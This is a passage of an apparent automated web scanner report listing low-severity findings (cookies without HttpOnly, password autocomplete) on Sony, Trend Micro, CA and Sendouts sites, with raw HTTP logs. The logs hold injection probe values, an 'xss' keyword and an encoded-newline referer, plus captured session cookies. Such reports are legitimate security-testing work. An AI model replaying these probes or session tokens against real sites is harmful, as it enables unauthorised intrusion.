GET /webapp/wcs/stores/servlet/SYErrorRedirect?URL=StoreCatalogDisplay&storeId=10151&langId=-1&catalogId=10551&eid=437018621 HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.1.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=session#1315352920400-736912#1315354842|PC#1315334914578-928682.19#1316562582|check#true#1315353042; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167; ensUID=249118483jocCbfxsy2s; s_cc=true; s_visit=1; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 302 Moved Temporarily Location: http://store.sony.com:80/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621 Content-Length: 0 Content-Type: text/html Content-Language: en-US Date: Tue, 06 Sep 2011 18:49:35 GMT Connection: close Vary: Accept-EncodingSet-Cookie: TS5bbf46=2877c4e6d661850e5150d0ea19ef0b38ff7b9fa6284bc12b4e666b3f; Path=/ Cache-Control: private
7.12. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SYSearchAjax
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1 Host: store.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE
Response
HTTP/1.1 200 OK ntCoent-Length: 811 Content-Type: text/html Content-Language: en-US Content-Length: 811 Date: Tue, 06 Sep 2011 18:58:53 GMT Connection: close Vary: Accept-EncodingSet-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/ Cache-Control: private {"ResultSet": { "suggestionList": [ { "value": "XSS680CX", "description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers", "img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C...[SNIP]...
7.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=eff63d3571683f04c37995dc222b8da043cb60bb051a376c4e666d6e; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=xss&x=0&y=0 HTTP/1.1 Host: store.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE
Response
HTTP/1.1 200 OK ntCoent-Length: 109762 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 109762 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:58:55 GMT Connection: closeSet-Cookie: TS5bbf46=eff63d3571683f04c37995dc222b8da043cb60bb051a376c4e666d6e; Path=/ Cache-Control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=8" /> <!-- AllSitesHeadInclude --> <script type...[SNIP]...
7.14. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js HTTP/1.1 Host: store.trendmicro.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Thu, 02 Jun 2016 03:00:48 GMT ETag: "80d-4891f577" Content-Type: application/x-javascript Last-Modified: Thu, 31 Jul 2008 17:25:11 GMT Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=2440;ecid=105660496814,0) Content-Length: 2061 Date: Thu, 02 Jun 2011 21:00:48 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app93 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/ var ptomodule={A:{},C:{},D:document,L:document.location,M:[],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA: {"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cooki...[SNIP]...
7.15. https://www.ca.com/siteminderagent/forms/login.fcc
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/siteminderagent/forms/login.fcc
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /siteminderagent/forms/login.fcc HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 Content-Length: 3488 Cache-Control: max-age=0 Origin: https://www.ca.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192 __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly...[SNIP]...
Response
HTTP/1.1 302 Object Moved Cache-control: no-store Location: /register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d Content-Length: 0set-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com set-cookie: SMTRYNO=1; path=/; domain=.ca.com
7.16. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:23:42 GMT Content-Length: 36056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]...
8. Password field with autocomplete enabled
previous
next
There are 9 instances of this issue:
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application. The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
8.1. http://webconnect.sendouts.com/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://webconnect.sendouts.com
Path:
/login.aspx
Issue detail
The page contains a form with the following action URL:http://webconnect.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= The form contains the following password field with autocomplete enabled:
Request
GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1 Host: webconnect.sendouts.com Proxy-Connection: keep-alive Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml" Date: Tue, 06 Sep 2011 20:31:59 GMT Content-Length: 6707 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>LogIn</title...[SNIP]... <body><form name="WebForm1" method="post" action="login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=" onsubmit="javascript:return WebForm_OnSubmit();" id="WebForm1"> <div>...[SNIP]... <br /> <input name="txtPassword" type="password" id="txtPassword" /> <span id="RequiredFieldValidator2" class="ErrorMsg" style="color:Red;display:none;">...[SNIP]...
8.2. https://www.ca.com/us/register/createprofile.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/createprofile.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/createprofile.aspx?returnURL=/us/default.aspx The form contains the following password fields with autocomplete enabled:
Request
GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:25:47 GMT Content-Length: 458334 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <scri...[SNIP]... <body><form name="mainForm" method="post" action="/us/register/createprofile.aspx?returnURL=/us/default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> <div>...[SNIP]... <div class="formitemfield"> <input name="txtPsw" type="password" id="txtPsw" maxlength="32" class="small formfieldwidth2 hastip" /> <div class="formtip2 blue small">...[SNIP]... <div class="formitemfield"> <input name="txtPswConf" type="password" id="txtPswConf" maxlength="32" class="small formfieldwidth2 hastip" /> <div class="formtip2 small">...[SNIP]...
8.3. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/login.aspx?returnURL=/us/default.aspx The form contains the following password field with autocomplete enabled:
Request
